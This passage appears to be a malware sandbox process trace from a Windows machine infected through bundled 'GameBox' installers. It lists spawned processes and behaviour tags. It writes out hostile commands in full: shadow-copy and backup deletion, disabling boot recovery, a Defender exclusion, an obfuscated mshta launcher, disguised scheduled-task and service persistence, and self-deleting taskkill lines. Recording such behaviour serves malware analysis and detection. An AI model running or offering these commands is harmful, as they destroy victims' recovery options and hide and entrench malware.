C:\Users\Admin\Documents\EcxkrYlXjFWozps0KfXcPBih.exe"C:\Users\Admin\Documents\EcxkrYlXjFWozps0KfXcPBih.exe"6⤵PID:7020
-
C:\Users\Admin\AppData\Roaming\8519783.exe"C:\Users\Admin\AppData\Roaming\8519783.exe"7⤵PID:4264
-
-
C:\Users\Admin\AppData\Roaming\4559407.exe"C:\Users\Admin\AppData\Roaming\4559407.exe"7⤵PID:7736
-
-
C:\Users\Admin\AppData\Roaming\4838338.exe"C:\Users\Admin\AppData\Roaming\4838338.exe"7⤵PID:6076
-
-
C:\Users\Admin\AppData\Roaming\1042904.exe"C:\Users\Admin\AppData\Roaming\1042904.exe"7⤵PID:4404
-
-
-
C:\Users\Admin\Documents\cmJqdpcjXKUbR3m5Z3_0JqSY.exe"C:\Users\Admin\Documents\cmJqdpcjXKUbR3m5Z3_0JqSY.exe"6⤵PID:6200
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "cmJqdpcjXKUbR3m5Z3_0JqSY.exe" /f & erase "C:\Users\Admin\Documents\cmJqdpcjXKUbR3m5Z3_0JqSY.exe" & exit7⤵PID:6372
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "cmJqdpcjXKUbR3m5Z3_0JqSY.exe" /f8⤵
- Kills process with taskkill
PID:3880
-
-
-
-
C:\Users\Admin\Documents\qAcud8SMFNB8kTq_c5vBilJT.exe"C:\Users\Admin\Documents\qAcud8SMFNB8kTq_c5vBilJT.exe"6⤵PID:7160
-
C:\Users\Admin\Documents\qAcud8SMFNB8kTq_c5vBilJT.exe"C:\Users\Admin\Documents\qAcud8SMFNB8kTq_c5vBilJT.exe"7⤵PID:7728
-
-
-
C:\Users\Admin\Documents\hFOgVv7sVPAhqtQnjPmrY2VI.exe"C:\Users\Admin\Documents\hFOgVv7sVPAhqtQnjPmrY2VI.exe"6⤵PID:6824
-
C:\Users\Admin\Documents\hFOgVv7sVPAhqtQnjPmrY2VI.exeC:\Users\Admin\Documents\hFOgVv7sVPAhqtQnjPmrY2VI.exe7⤵PID:7944
-
-
-
C:\Users\Admin\Documents\XJIwItsrEQT2QRtA02dQLCsL.exe"C:\Users\Admin\Documents\XJIwItsrEQT2QRtA02dQLCsL.exe"6⤵PID:6252
-
C:\Users\Admin\Documents\XJIwItsrEQT2QRtA02dQLCsL.exe"C:\Users\Admin\Documents\XJIwItsrEQT2QRtA02dQLCsL.exe" -q7⤵PID:2180
-
-
-
C:\Users\Admin\Documents\a1x8vi5CRgvTnErKCJpeeGwR.exe"C:\Users\Admin\Documents\a1x8vi5CRgvTnErKCJpeeGwR.exe"6⤵PID:6992
-
-
C:\Users\Admin\Documents\VMisAlFFoyk_Y6PUk2Qo0dmL.exe"C:\Users\Admin\Documents\VMisAlFFoyk_Y6PUk2Qo0dmL.exe"6⤵PID:6828
-
C:\Users\Admin\Documents\VMisAlFFoyk_Y6PUk2Qo0dmL.exe"C:\Users\Admin\Documents\VMisAlFFoyk_Y6PUk2Qo0dmL.exe"7⤵PID:7224
-
-
-
C:\Users\Admin\Documents\NUeVmEQjXpQ2zPtRPyFFiKPO.exe"C:\Users\Admin\Documents\NUeVmEQjXpQ2zPtRPyFFiKPO.exe"6⤵PID:6616
-
C:\Users\Admin\Documents\NUeVmEQjXpQ2zPtRPyFFiKPO.exe"C:\Users\Admin\Documents\NUeVmEQjXpQ2zPtRPyFFiKPO.exe"7⤵PID:5876
-
-
-
C:\Users\Admin\Documents\MKyTfgVpJWs7VMhkgvWfOJn3.exe"C:\Users\Admin\Documents\MKyTfgVpJWs7VMhkgvWfOJn3.exe"6⤵PID:912
-
C:\Users\Admin\AppData\Local\Temp\is-H3N7H.tmp\MKyTfgVpJWs7VMhkgvWfOJn3.tmp"C:\Users\Admin\AppData\Local\Temp\is-H3N7H.tmp\MKyTfgVpJWs7VMhkgvWfOJn3.tmp" /SL5="$105A2,138429,56832,C:\Users\Admin\Documents\MKyTfgVpJWs7VMhkgvWfOJn3.exe"7⤵PID:7272
-
C:\Users\Admin\AppData\Local\Temp\is-DD5N7.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-DD5N7.tmp\Setup.exe" /Verysilent8⤵PID:8632
-
C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe"C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"9⤵PID:8876
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629579453 /qn CAMPAIGN=""710"" " CAMPAIGN="710"10⤵PID:2900
-
-
-
-
-
-
C:\Users\Admin\Documents\ORxhVK8kEFoBq4GaRAO_7wu3.exe"C:\Users\Admin\Documents\ORxhVK8kEFoBq4GaRAO_7wu3.exe"6⤵PID:1192
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe C:\Users\Admin\DOCUME~1\ORXHVK~1.DLL,s C:\Users\Admin\DOCUME~1\ORXHVK~1.EXE7⤵PID:8268
-
C:\Windows\SysWOW64\RUNDLL32.EXEC:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\ORXHVK~1.DLL,flYoQVU4Q1hv8⤵PID:6980
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\Users\Admin\DOCUME~1\ORXHVK~1.DLL9⤵PID:9592
-
-
-
-
-
C:\Users\Admin\Documents\pbJKK_vRnLey4OYRe7B2aoXF.exe"C:\Users\Admin\Documents\pbJKK_vRnLey4OYRe7B2aoXF.exe"6⤵PID:4108
-
-
C:\Users\Admin\Documents\rI3KzDzc2pn8cltWzDk9UpqP.exe"C:\Users\Admin\Documents\rI3KzDzc2pn8cltWzDk9UpqP.exe"6⤵PID:7356
-
-
C:\Users\Admin\Documents\os6YmT5_k0wYJwE7FsfxYIz0.exe"C:\Users\Admin\Documents\os6YmT5_k0wYJwE7FsfxYIz0.exe"6⤵PID:7428
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "os6YmT5_k0wYJwE7FsfxYIz0.exe" /f & erase "C:\Users\Admin\Documents\os6YmT5_k0wYJwE7FsfxYIz0.exe" & exit7⤵PID:8232
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "os6YmT5_k0wYJwE7FsfxYIz0.exe" /f8⤵
- Kills process with taskkill
PID:9040
-
-
-
-
C:\Users\Admin\Documents\DoVsZrVP7OsD8AZhSz8oyfeE.exe"C:\Users\Admin\Documents\DoVsZrVP7OsD8AZhSz8oyfeE.exe"6⤵PID:7472
-
C:\Users\Admin\Documents\DoVsZrVP7OsD8AZhSz8oyfeE.exeC:\Users\Admin\Documents\DoVsZrVP7OsD8AZhSz8oyfeE.exe7⤵PID:8048
-
-
-
C:\Users\Admin\Documents\cn2cU3qpc1gzJPMa4jlUwHlA.exe"C:\Users\Admin\Documents\cn2cU3qpc1gzJPMa4jlUwHlA.exe"6⤵PID:7572
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCRipt:ClOSe( creATEoBJEcT("WscRIpT.sHEll" ).RUN("Cmd /Q /C tYPe ""C:\Users\Admin\Documents\cn2cU3qpc1gzJPMa4jlUwHlA.exe"" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if """" == """" for %W iN ( ""C:\Users\Admin\Documents\cn2cU3qpc1gzJPMa4jlUwHlA.exe"" ) do taskkill -IM ""%~nXW"" -f " ,0 ,TRUE ) )7⤵PID:4536
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C tYPe "C:\Users\Admin\Documents\cn2cU3qpc1gzJPMa4jlUwHlA.exe" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if ""=="" for %W iN ( "C:\Users\Admin\Documents\cn2cU3qpc1gzJPMa4jlUwHlA.exe") do taskkill -IM "%~nXW" -f8⤵PID:7396
-
C:\Windows\SysWOW64\taskkill.exetaskkill -IM "cn2cU3qpc1gzJPMa4jlUwHlA.exe" -f9⤵
- Kills process with taskkill
PID:7888
-
-
-
-
-
C:\Users\Admin\Documents\SyrynTdyz3YzncL0tGWzQKBr.exe"C:\Users\Admin\Documents\SyrynTdyz3YzncL0tGWzQKBr.exe"6⤵PID:7564
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7564 -s 6807⤵
- Program crash
PID:6388
-
-
-
C:\Users\Admin\Documents\8hi3kRJgV_6snutnQToKTXM4.exe"C:\Users\Admin\Documents\8hi3kRJgV_6snutnQToKTXM4.exe"6⤵PID:7504
-
-
C:\Users\Admin\Documents\mcKO0rhbjazl2_yZMcgezZ_6.exe"C:\Users\Admin\Documents\mcKO0rhbjazl2_yZMcgezZ_6.exe"6⤵PID:7752
-
-
C:\Users\Admin\Documents\WUgD27EXN5sPw0z_i8VCtWrD.exe"C:\Users\Admin\Documents\WUgD27EXN5sPw0z_i8VCtWrD.exe"6⤵PID:7744
-
-
C:\Users\Admin\Documents\8D6BLpa8i0Z26NXSipY7PBOW.exe"C:\Users\Admin\Documents\8D6BLpa8i0Z26NXSipY7PBOW.exe"6⤵PID:7912
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"5⤵PID:5236
-
C:\Users\Admin\AppData\Local\Temp\is-D5MV0.tmp\MediaBurner2.tmp"C:\Users\Admin\AppData\Local\Temp\is-D5MV0.tmp\MediaBurner2.tmp" /SL5="$9007A,506127,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"6⤵PID:5716
-
C:\Users\Admin\AppData\Local\Temp\is-SP2JB.tmp\ultradumnibour.exe"C:\Users\Admin\AppData\Local\Temp\is-SP2JB.tmp\ultradumnibour.exe" /S /UID=burnerch27⤵PID:6016
-
C:\Program Files\Reference Assemblies\SATYGUEUCE\ultramediaburner.exe"C:\Program Files\Reference Assemblies\SATYGUEUCE\ultramediaburner.exe" /VERYSILENT8⤵PID:2292
-
C:\Users\Admin\AppData\Local\Temp\is-NAU3B.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-NAU3B.tmp\ultramediaburner.tmp" /SL5="$501E4,281924,62464,C:\Program Files\Reference Assemblies\SATYGUEUCE\ultramediaburner.exe" /VERYSILENT9⤵PID:6092
-
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu10⤵PID:4588
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\b0-2a5ca-8b6-d6d97-b51a055fa5441\Rutyxudewo.exe"C:\Users\Admin\AppData\Local\Temp\b0-2a5ca-8b6-d6d97-b51a055fa5441\Rutyxudewo.exe"8⤵PID:7712
-
-
C:\Users\Admin\AppData\Local\Temp\41-4e43f-d30-d1eb6-10ad68e033512\Baburaebudo.exe"C:\Users\Admin\AppData\Local\Temp\41-4e43f-d30-d1eb6-10ad68e033512\Baburaebudo.exe"8⤵PID:5940
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ulwba4xf.vnw\GcleanerEU.exe /eufive & exit9⤵PID:7932
-
C:\Users\Admin\AppData\Local\Temp\ulwba4xf.vnw\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\ulwba4xf.vnw\GcleanerEU.exe /eufive10⤵PID:9232
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "GcleanerEU.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\ulwba4xf.vnw\GcleanerEU.exe" & exit11⤵PID:8356
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "GcleanerEU.exe" /f12⤵
- Kills process with taskkill
PID:9784
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xsgmpnah.whi\installer.exe /qn CAMPAIGN="654" & exit9⤵PID:8916
-
C:\Users\Admin\AppData\Local\Temp\xsgmpnah.whi\installer.exeC:\Users\Admin\AppData\Local\Temp\xsgmpnah.whi\installer.exe /qn CAMPAIGN="654"10⤵PID:9408
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\syrfdl35.dl4\anyname.exe & exit9⤵PID:8268
-
C:\Users\Admin\AppData\Local\Temp\syrfdl35.dl4\anyname.exeC:\Users\Admin\AppData\Local\Temp\syrfdl35.dl4\anyname.exe10⤵PID:9720
-
C:\Users\Admin\AppData\Local\Temp\syrfdl35.dl4\anyname.exe"C:\Users\Admin\AppData\Local\Temp\syrfdl35.dl4\anyname.exe" -q11⤵PID:10052
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mzdnvu5p.ntt\gcleaner.exe /mixfive & exit9⤵PID:9224
-
C:\Users\Admin\AppData\Local\Temp\mzdnvu5p.ntt\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\mzdnvu5p.ntt\gcleaner.exe /mixfive10⤵PID:9972
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "gcleaner.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\mzdnvu5p.ntt\gcleaner.exe" & exit11⤵PID:1460
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "gcleaner.exe" /f12⤵
- Kills process with taskkill
PID:8768
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\44pbvujw.43v\autosubplayer.exe /S & exit9⤵PID:9432
-
-
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"5⤵PID:5968
-
C:\Users\Admin\AppData\Roaming\4306120.exe"C:\Users\Admin\AppData\Roaming\4306120.exe"6⤵PID:6680
-
-
C:\Users\Admin\AppData\Roaming\7847786.exe"C:\Users\Admin\AppData\Roaming\7847786.exe"6⤵PID:6724
-
-
C:\Users\Admin\AppData\Roaming\3136937.exe"C:\Users\Admin\AppData\Roaming\3136937.exe"6⤵PID:6752
-
-
C:\Users\Admin\AppData\Roaming\6146529.exe"C:\Users\Admin\AppData\Roaming\6146529.exe"6⤵PID:6672
-
-
C:\Users\Admin\AppData\Roaming\2910211.exe"C:\Users\Admin\AppData\Roaming\2910211.exe"6⤵PID:6656
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe"C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet5⤵PID:5808
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629579453 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"6⤵PID:6340
-
-
-
-
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:6032 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:5504
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:5664
-
C:\ProgramData\seqgiw\gvdxatb.exeC:\ProgramData\seqgiw\gvdxatb.exe start1⤵PID:7488
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵PID:3896
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 34CF5AF9EF853826DC3F8B382D9FE4AB C2⤵PID:7340
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding FA54494BD001A8535494D1F850CDD8622⤵PID:8236
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding D5A875440423052CB508D0646D892E61 C2⤵PID:1316
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding C681D80728D0794D4129A37732D0561B C2⤵PID:3308
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:2248 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:8808
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:9444
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:9572
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:4636
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:10192
-
C:\Users\Admin\AppData\Local\Temp\CA91.exeC:\Users\Admin\AppData\Local\Temp\CA91.exe1⤵PID:6852
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:3020 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:6188
-
-
C:\Users\Admin\AppData\Local\Temp\E231.exeC:\Users\Admin\AppData\Local\Temp\E231.exe1⤵PID:10000
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:7248
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall1⤵PID:9772
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{41557440-35fb-5742-aa2f-065012fa7a1a}\oemvista.inf" "9" "4d14a44ff" "0000000000000178" "WinSta0\Default" "000000000000017C" "208" "c:\program files (x86)\maskvpn\driver\win764"2⤵PID:7424
-
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000174"2⤵PID:5200
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:9940
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc1⤵PID:7476
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵PID:9232
-
C:\Users\Admin\AppData\Local\Temp\1901.exeC:\Users\Admin\AppData\Local\Temp\1901.exe1⤵PID:4952
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:1448
-
C:\Users\Admin\AppData\Local\Temp\73A5.exeC:\Users\Admin\AppData\Local\Temp\73A5.exe1⤵PID:7296
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\scfajdur\2⤵PID:5244
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\gpftuixd.exe" C:\Windows\SysWOW64\scfajdur\2⤵PID:4384
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" create scfajdur binPath= "C:\Windows\SysWOW64\scfajdur\gpftuixd.exe /d\"C:\Users\Admin\AppData\Local\Temp\73A5.exe\"" type= own start= auto DisplayName= "wifi support"2⤵PID:3632
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" description scfajdur "wifi internet conection"2⤵PID:5148
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" start scfajdur2⤵PID:8812
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul2⤵PID:9144
-
-
C:\Users\Admin\xgomfhkk.exe"C:\Users\Admin\xgomfhkk.exe" /d"C:\Users\Admin\AppData\Local\Temp\73A5.exe"2⤵PID:1528
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\swdhjmco.exe" C:\Windows\SysWOW64\scfajdur\3⤵PID:9796
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" config scfajdur binPath= "C:\Windows\SysWOW64\scfajdur\swdhjmco.exe /d\"C:\Users\Admin\xgomfhkk.exe\""3⤵PID:8464
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" start scfajdur3⤵PID:6272
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6782.bat" "3⤵PID:10096
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul3⤵PID:2788
-
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:4836 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:8364
-
-
C:\Users\Admin\AppData\Local\Temp\8058.exeC:\Users\Admin\AppData\Local\Temp\8058.exe1⤵PID:4280
-
C:\Users\Admin\AppData\Local\Temp\9D09.exeC:\Users\Admin\AppData\Local\Temp\9D09.exe1⤵PID:10092
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe"1⤵PID:9276
-
C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exeMaskVPNUpdate.exe /silent2⤵PID:228
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:10088
-
C:\Users\Admin\AppData\Local\Temp\D08D.exeC:\Users\Admin\AppData\Local\Temp\D08D.exe1⤵PID:7356
-
C:\Users\Admin\AppData\Local\Temp\E29F.exeC:\Users\Admin\AppData\Local\Temp\E29F.exe1⤵PID:9884
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe" -start2⤵PID:9380
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe" -agent 03⤵PID:10560
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\~temp001.bat3⤵PID:10552
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete4⤵PID:7292
-
-
C:\Windows\SysWOW64\vssadmin.exevssadmin delete shadows /all /quiet4⤵
- Interacts with shadow copies
PID:6360
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet3⤵PID:10544
-
C:\Windows\SysWOW64\vssadmin.exevssadmin delete shadows /all /quiet4⤵
- Interacts with shadow copies
PID:10840
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet3⤵PID:10536
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures3⤵PID:10528
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no3⤵PID:10520
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete3⤵PID:10512
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete4⤵PID:10832
-
-
-
C:\Windows\SysWOW64\notepad.exenotepad.exe3⤵PID:1008
-
-
-
C:\Windows\SysWOW64\notepad.exenotepad.exe2⤵PID:4808
-
-
C:\Users\Admin\AppData\Local\Temp\328.exeC:\Users\Admin\AppData\Local\Temp\328.exe1⤵PID:1816
-
C:\Users\Admin\Documents\Update.exe"C:\Users\Admin\Documents\Update.exe"2⤵PID:9968
-
C:\Users\Admin\AppData\Local\Temp\Red1_.exe"C:\Users\Admin\AppData\Local\Temp\Red1_.exe"3⤵PID:7512
-
-
C:\Users\Admin\AppData\Local\Temp\DriverUpdate.exe"C:\Users\Admin\AppData\Local\Temp\DriverUpdate.exe"3⤵PID:8988
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "WindowsSecurity" /tr '"C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe"' & exit4⤵PID:4496
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "WindowsSecurity" /tr '"C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe"'5⤵
- Creates scheduled task(s)
PID:5772
-
-
-
C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe"C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe"4⤵PID:10448
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "WindowsSecurity" /tr '"C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe"' & exit5⤵PID:9036
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "WindowsSecurity" /tr '"C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe"'6⤵
- Creates scheduled task(s)
PID:4152
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"5⤵PID:6604
-
-
